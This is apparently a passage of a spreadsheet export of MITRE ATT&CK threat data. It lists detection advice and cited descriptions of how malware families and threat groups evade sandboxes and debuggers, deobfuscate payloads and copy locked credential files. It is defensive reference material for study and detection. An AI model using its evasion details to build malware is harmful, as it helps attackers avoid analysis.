[OSX/Shlayer](https://attack.mitre.org/software/S0402) can base64-decode and AES-decrypt downloaded payloads.(Citation: Carbon Black Shlayer Feb 2019) Versions of [OSX/Shlayer](https://attack.mitre.org/software/S0402) pass encrypted and password-protected code to &lt;code&gt;openssl&lt;/code&gt; and then write the payload to the &lt;code&gt;/tmp&lt;/code&gt; folder.(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses a decode routine combining bit shifting and XOR operations with a variable key that depends on the length of the string that was encoded. If the computation for the variable XOR key turns out to be 0, the default XOR key of 0x1B is used. This routine is also referenced as the `rotate` function in reporting.(Citation: Unit42 OceanLotus 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439)'s loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption.(Citation: ESET Okrum July 2019)
OnionDuke
[OnionDuke](https://attack.mitre.org/software/S0052) can use a custom decryption algorithm to decrypt strings.(Citation: ESET Dukes October 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.(Citation: Unit 42 OopsIE! Feb 2018)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use a decryption mechanism to process a user supplied password and allow execution.(Citation: A</t>
  </si>
  <si>
    <t xml:space="preserve">Image Creation
Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment.
Network Connection Creation
Monitor for established network communications with anomalous IPs that have never been seen before in the environment that may indicate the download of malicious code.
Network Traffic Content
Monitor for network traffic associated with requests and/or downloads of container images, especially those that may be anomalous or known malicious.
Network Traffic Flow
Monitor for established network communications with anomalous IPs that have never been seen before in the environment that may indicate the download of malicious code.
Audit
Audit images deployed within the environment to ensure they do not contain any malicious components.
Limit Access to Resource Over Network
Limit communications with the container service to local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API on port 2375. Instead, communicate with the Docker API over TLS on port 2376.(Citation: Docker Daemon Socket Protect)
Network Segmentation
Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.
Privileged Account Management
Ensure containers are not running as root by default. In Kubernetes environments, consider defining Pod Security Standards that prevent pods from running privileged containers.(Citation: Kubernetes Hardening Guide)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.
Drive Access
Monitor handle opens on volumes that are made by processes to determine when they may be directly collecting data from logical drives. (Citation: Github PowerSploit Ninjacopy)
File Creation
Monitor for the creation of volume shadow copy and backup files, especially unexpected and irregular activity (relative to time, user, etc.).
Behavior Prevention on Endpoint
Some endpoint security solutions can be configured to block some types of behaviors related to efforts by an adversary to create backups, such as command execution or preventing API calls to backup related services.
User Account Management
Ensure only accounts required to configure and manage backups have the privileges to do so. Monitor these accounts for unauthorized backup activity.
esentutl
[esentutl](https://attack.mitre.org/software/S0404) can use the Volume Shadow Copy service to copy locked files such as `ntds.dit`.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
OS API Execution
Monitor for API calls that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
Process Creation
Virtualization, sandbox, user activity, and related discovery techniques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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used tools that conducted a variety of system checks to detect sandboxes or VMware services.(Citation: ClearSky Lazarus Aug 2020)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with &lt;code&gt;.Md5.exe&lt;/code&gt;, and if the program is executed from the root of the C:\ drive, as well as checks for sandbox-related libraries.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)(Citation: Microsoft DUBNIUM June 2016)
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments. (Citation: ESET EvilNum July 2020)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used macros to verify if a mouse is connected to a compromised machine.(Citation: Check Point APT34 April 2021)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has run system checks to determine if they were operating in a virtualized environment.(Citation: Microsoft Volt Typhoon May 2023)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.(Citation: Securelist Brazilian Banking Malware July 2020)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can identify strings such as Virtual, vmware, or VirtualBox to detect virtualized environments.(Citation: Telefonica Snip3 December 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438) can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.(Citation: ESET Attor Oct 2019)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can check to see if the infected machine has VM tools running.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information. (Citation: Unit 42 BadPatch Oct 2017)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can check system flags and libraries, process timing, and API's to detect code emulation or sandboxing.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Check Point Black Basta October 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.(Citation: Medium Ali Salem Bumblebee April 2022)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) can search loaded modules, PEB structure, file paths, Registry keys, and memory to determine if it is being debugged or running in a virtual environment.(Citation: Cybereason Kimsuky November 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can search a compromised system's running processes and services to detect Hyper-V, QEMU, Virtual PC, Virtual Box, and VMware, as well as Sandboxie.(Citation: Secureworks DarkTortilla Aug 2022)
Denis
[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)
Dyre
[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396)'s dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.(Citation: Cyphort EvilBunny Dec 2014)	
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) can run anti-sandbox checks using the Microsoft Excel 4.0 function &lt;code&gt;GET.WORKSPACE&lt;/code&gt; to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds.(Citation: Kaspersky WIRTE November 2021)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.(Citation: Microsoft FinFisher March 2018)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) will check if it is being run in a virtualized environment by comparing the collected MAC address to &lt;code&gt;c8:27:cc:c2:37:5a&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can detect VMWare via its I/O port and Virtual PC via the &lt;code&gt;vpcext&lt;/code&gt; instruction.(Citation: ESET Grandoreiro April 2020)
GravityRAT
[GravityRAT](https://attack.mitre.org/software/S0237) uses WMI to check the BIOS and manufacturer information for strings like "VMWare", "Virtual", and "XEN" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment. (Citation: Talos GravityRAT)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call &lt;code&gt;EnumWindows&lt;/code&gt;, and checking for Qemu guest agent.(Citation: Medium Eli Salem GuLoader April 2021)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.(Citation: ESET InvisiMole June 2020)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.(Citation: Unit 42 Lucifer June 2020)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.(Citation: IBM MegaCortex) 
NativeZone
[NativeZone](https://attack.mitre.org/software/S0637) has checked if Vmware or VirtualBox VM is running on a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) checks a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as `sysctl hw.model` and the kernel boot time.(Citation: Unit42 OceanLotus 2017)(Citation: ESET OceanLotus macOS April 2019)(Citation: 20 macOS Common Tools and Techniques)
ObliqueRAT
[ObliqueRAT](https://attack.mitre.org/software/S0644) can halt execution if it identifies processes belonging to virtual machine software or analysis tools.(Citation: Talos Oblique RAT March 2021)
Okrum
[Okrum](https://attack.mitre.org/software/S0439)'s loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.(Citation: ESET Okrum July 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) performs several anti-VM and sandbox checks on the victim's machine. One technique the group has used was to perform a WMI query &lt;code&gt;SELECT * FROM MSAcpi_ThermalZoneTemperature&lt;/code&gt; to check the temperature to see if it’s running in a virtual environment.(Citation: Unit 42 OilRig Sept 2018)
P8RAT
[P8RAT](https://attack.mitre.org/software/S0626) can check the compromised host for processes associated with VMware or VirtualBox environments.(Citation: Securelist APT10 March 2021)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) checks if VMware tools is running in the background by searching for any process named "vmtoolsd".(Citation: Unit42 PlugX June 2017)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of "License.txt" and exiting.(Citation: Talos PoetRAT April 2020)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) has a module that checks a number of indicators on the system to determine if its running on a virtual machine.(Citation: GitHub Pupy)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.(Citation: Trend Micro Qakbot May 2020)(Citation: ATT QakBot April 2021)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can check for VMware-related files and DLLs related to sandboxes.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)(Citation: Malwarebytes RokRAT VBA January 2021)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) searches for Sandboxie and VMware on the system.(Citation: Talos Remcos Aug 2018)
RogueRobin
[RogueRobin](https://attack.mitre.org/software/S0270) uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) checked the domain name of the compromised host to verify it was running in a real environment.(Citation: Microsoft Analyzing Solorigate Dec 2020)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) has the ability to determine if its runtime environment is virtualized.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has run several virtual machine and sandbox checks, including checking if `Sbiedll.dll` is present in a list of loaded modules, comparing the machine name to `HAL9TH` and the user name to `JohnDoe`, and checking the BIOS version for known virtual machine identifiers.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Shark
[Shark](https://attack.mitre.org/software/S1019) can stop execution if the screen width of the targeted machine is not over 600 pixels.(Citation: ClearSky Siamesekitten August 2021)
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) scans processes to perform anti-VM checks. (Citation: Talos Smoke Loader July 2018)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) has the ability to detect Windows Sandbox, VMWare, or VirtualBox by querying `Win32_ComputerSystem` to extract the `Manufacturer` string.(Citation: Morphisec Snip3 May 2021)
SodaMaster
[SodaMaster](https://attack.mitre.org/software/S0627) can check for the presence of the Registry key &lt;code&gt;HKEY_CLASSES_ROOT\\Applications\\VMwareHostOpen.exe&lt;/code&gt; before proceeding to its main functionality.(Citation: Securelist APT10 March 2021)	 
SynAck
[SynAck](https://attack.mitre.org/software/S0242) checks its directory location in an attempt to avoid launching in a sandbox.(Citation: SecureList SynAck Doppelgänging May 2018)(Citation: Kaspersky Lab SynAck May 2018)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.(Citation: Secureworks Karagany July 2019)
UBoatRAT
[UBoatRAT](https://attack.mitre.org/software/S0333) checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.(Citation: PaloAlto UBoatRAT Nov 2017)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.(Citation: NCC Group WastedLocker June 2020)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can stop its execution when it recognizes the presence of certain monitoring tools.(Citation: Unit 42 WhisperGate January 2022)
macOS.OSAMiner
[macOS.OSAMiner](https://attack.mitre.org/software/S1048) can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.(Citation: SentinelLabs reversing run-only applescripts 2021)
yty
[yty](https://attack.mitre.org/software/S0248) has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware. (Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
OS API Execution
Monitor for API calls that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
Process Creation
Virtualization, sandbox, user activity, and related discovery techniques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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.(Citation: ESET Operation Spalax Jan 2021)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) malware has employed just-in-time decryption of strings to evade sandbox detection.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)
Agent Tesla
 [Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can attempt to overload sandbox analysis by sending 1550 calls to &lt;code&gt;printf&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) can check to determine if the compromised system is running on VMware.(Citation: Talos Bisonal Mar 2020)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can make a random number of calls to the `kernel32.beep` function to hinder log analysis.(Citation: Check Point Black Basta October 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to perform anti-virtualization checks.(Citation: Proofpoint Bumblebee April 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023)  includes runtime checks to identify an analysis environment and prevent execution on it.(Citation: FireEye APT28)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.(Citation: ESET Carberp March 2012)
CozyCar
Some versions of [CozyCar](https://attack.mitre.org/software/S0046) will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.(Citation: F-Secure CozyDuke)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.(Citation: Cyble Egregor Oct 2020)(Citation: NHS Digital Egregor Nov 2020) 
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use junk code to generate random activity to obscure malware behavior.(Citation: ESET Gelsemium June 2021)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.(Citation: FireEye Hancitor)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can sleep for a time interval between C2 communication attempts.(Citation: Kaspersky Lyceum October 2021)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution.(Citation: Medium Metamorfo Apr 2020) 
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) has the ability to use anti-detection functions to identify sandbox environments.(Citation: Unit 42 Gamaredon February 2022)
RTM
[RTM](https://attack.mitre.org/software/S0148) can detect if it is running within a sandbox or other virtualized analysis environment.(Citation: Unit42 Redaman January 2019)	
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.(Citation: Kaspersky StoneDrill 2017)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
OS API Execution
Monitor for API calls that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
Process Creation
User activity-based checks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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.(Citation: FireEye FIN7 April 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) 
Spark
[Spark](https://attack.mitre.org/software/S0543) has used a splash screen to check whether an user actively clicks on the screen before running malicious code.(Citation: Unit42 Molerat Mar 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
OS API Execution
Monitor for API calls that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.
Process Creation
Time-based evasion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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used tools that collected `GetTickCount` and `GetSystemTimeAsFileTime` data to detect sandbox or VMware services.(Citation: ClearSky Lazarus Aug 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has waited a specified time before downloading a second stage payload.(Citation: CISA AppleJeus Feb 2021)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has delayed communication to the actor-controlled IP address by 5 minutes.(Citation: Accenture MUDCARP March 2019)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can use a timer to delay execution of core functionality.(Citation: NCC Group Team9 June 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) can check for analysis environments and signs of debugging using the Windows API &lt;code&gt;kernel32!GetTickCountKernel32&lt;/code&gt; call.(Citation: Unit42 BendyBear Feb 2021) 
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) 
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can call `NtDelayExecution` to pause execution.(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has the ability to set a hardcoded and randomized sleep interval.(Citation: Proofpoint Bumblebee April 2022)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can wait 30 minutes before initiating contact with C2.(Citation: Trend Micro DRBControl February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) has used the &lt;code&gt;sleep&lt;/code&gt; command to avoid sandbox detection.(Citation: Unit42 Clop April 2021)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can determine when it has been installed on a host for at least 15 days before downloading the final payload.(Citation: Proofpoint Operation Transparent Tribe March 2016)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to measure function timing.(Citation: ClearSky Lazarus Aug 2020) [DRATzarus](https://attack.mitre.org/software/S0694) can also remotely shut down into sleep mode under specific conditions to evade 
detection.(Citation: ClearSky Lazarus Aug 2020)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can implement the `kernel32.dll` Sleep function to delay execution for up to 300 seconds before implementing persistence or processing an addon package.(Citation: Secureworks DarkTortilla Aug 2022)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) can perform a  long sleep (greater than or equal to 3 minutes) to evade detection.(Citation: JoeSecurity Egregor 2020)
EvilBunny
[EvilBunny](https://attack.mitre.org/software/S0396) has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can turn itself on or off at random intervals.(Citation: ESET Dukes October 2019)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.(Citation: MSTIC NOBELIUM Mar 2021)
GoldenSpy
[GoldenSpy](https://attack.mitre.org/software/S0493)'s installer has delayed installation of [GoldenSpy](https://attack.mitre.org/software/S0493) for two hours after it reaches a victim system.(Citation: Trustwave GoldenSpy June 2020)	
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can sleep for 195 - 205 seconds after payload execution and before deleting its task.(Citation: Group IB GrimAgent July 2021)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) has the ability to perform anti-debugging based on time checks, API calls, and CPUID.(Citation: Medium Eli Salem GuLoader April 2021)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.(Citation: Crowdstrike DriveSlayer February 2022)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) can wait 30 seconds before executing additional code if security software is detected.(Citation: ESET Dukes October 2019)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has performed a time-based anti-debug check before downloading its third stage.(Citation: Talos Lokibot Jan 2021)
Okrum
[Okrum](https://attack.mitre.org/software/S0439)'s loader can detect presence of an emulator by using two calls to GetTickCount API, and checking whether the time has been accelerated.(Citation: ESET Okrum July 2019)
P8RAT
[P8RAT](https://attack.mitre.org/software/S0626) has the ability to "sleep" for a specified time to evade detection.(Citation: Securelist APT10 March 2021)
Pony
[Pony](https://attack.mitre.org/software/S0453) has delayed execution using a built-in function to avoid detection and analysis.(Citation: Malwarebytes Pony April 2016)	
QakBot
The [QakBot](https://attack.mitre.org/software/S0650) dropper can delay dropping the payload to evade detection.(Citation: Cyberint Qakbot May 2021)(Citation: Kaspersky QakBot September 2021)
Raindrop
After initial installation, [Raindrop](https://attack.mitre.org/software/S0565) runs a computation to delay execution.(Citation: Symantec RAINDROP January 2021)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) remained dormant after initial access for a period of up to two weeks.(Citation: FireEye SUNBURST Backdoor December 2020)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) can enter a sleep stage for 30 minutes to evade detection.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used the command `timeout 20` to pause the execution of its initial loader.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can execute `WScript.Sleep` to delay execution of its second stage.(Citation: Morphisec Snip3 May 2021)
SodaMaster
[SodaMaster](https://attack.mitre.org/software/S0627) has the ability to put itself to "sleep" for a specified time.(Citation: Securelist APT10 March 2021)
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) can modify its sleep time responses from the default of 20-22 seconds.(Citation: Cybereason StrifeWater Feb 2022)
ThiefQuest
[ThiefQuest](https://attack.mitre.org/software/S0595) invokes &lt;code&gt;time&lt;/code&gt; call to check the system's time, executes a &lt;code&gt;sleep&lt;/code&gt; command, invokes a second &lt;code&gt;time&lt;/code&gt; call, and then compares the time difference between the two &lt;code&gt;time&lt;/code&gt; calls and the amount of time the system slept to identify the sandbox.(Citation: wardle evilquest parti)
Tomiris
[Tomiris](https://attack.mitre.org/software/S0671) has the ability to sleep for at least nine minutes to evade sandbox-based analysis systems.(Citation: Kaspersky Tomiris Sep 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has used &lt;code&gt;printf&lt;/code&gt; and file I/O loops to delay process execution as part of API hammering.(Citation: Joe Sec Trickbot)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used a 30 minute delay after execution to evade sandbox monitoring tools.(Citation: TrendMicro Ursnif File Dec 2014)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can pause for 20 seconds to bypass antivirus solutions.(Citation: Medium S2W WhisperGate January 2022)(Citation: RecordedFuture WhisperGate Jan 2022)
XCSSET
Using the machine's local time, [XCSSET](https://attack.mitre.org/software/S0658) waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, &lt;code&gt;.report&lt;/code&gt;. After the elapsed time, [XCSSET](https://attack.mitre.org/software/S0658) executes additional modules.(Citation: trendmicro xcsset xcode project 2020)
metaMain
[metaMain](https://attack.mitre.org/software/S1059) has delayed execution for five to six minutes during its persistence establishment process.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor debugger logs for signs of abnormal and potentially malicious activity.
Command Execution
Monitor executed commands and arguments that may employ various means to detect and avoid debugged environments. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required.
OS API Execution
Monitor for API calls (such as &lt;code&gt;IsDebuggerPresent()&lt;/code&gt;) that may employ various means to detect and avoid debugged environments. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required.
Process Creation
Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. Debugger related system checks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Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used tools that used the `IsDebuggerPresent` call to detect debuggers.(Citation: ClearSky Lazarus Aug 2020)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can use the `CheckRemoteDebuggerPresent` function to detect the presence of a debugger.(Citation: Telefonica Snip3 December 2021)
Black Basta
The [Black Basta](https://attack.mitre.org/software/S1070) dropper can check system flags, CPU registers, CPU instructions, process timing, system libraries, and APIs to determine if a debugger is present.(Citation: Check Point Black Basta October 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can search for tools used in static analysis.(Citation: Medium Ali Salem Bumblebee April 2022)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can use `IsDebuggerPresent` to detect whether a debugger is present on a victim.(Citation: ClearSky Lazarus Aug 2020)
DarkTortilla
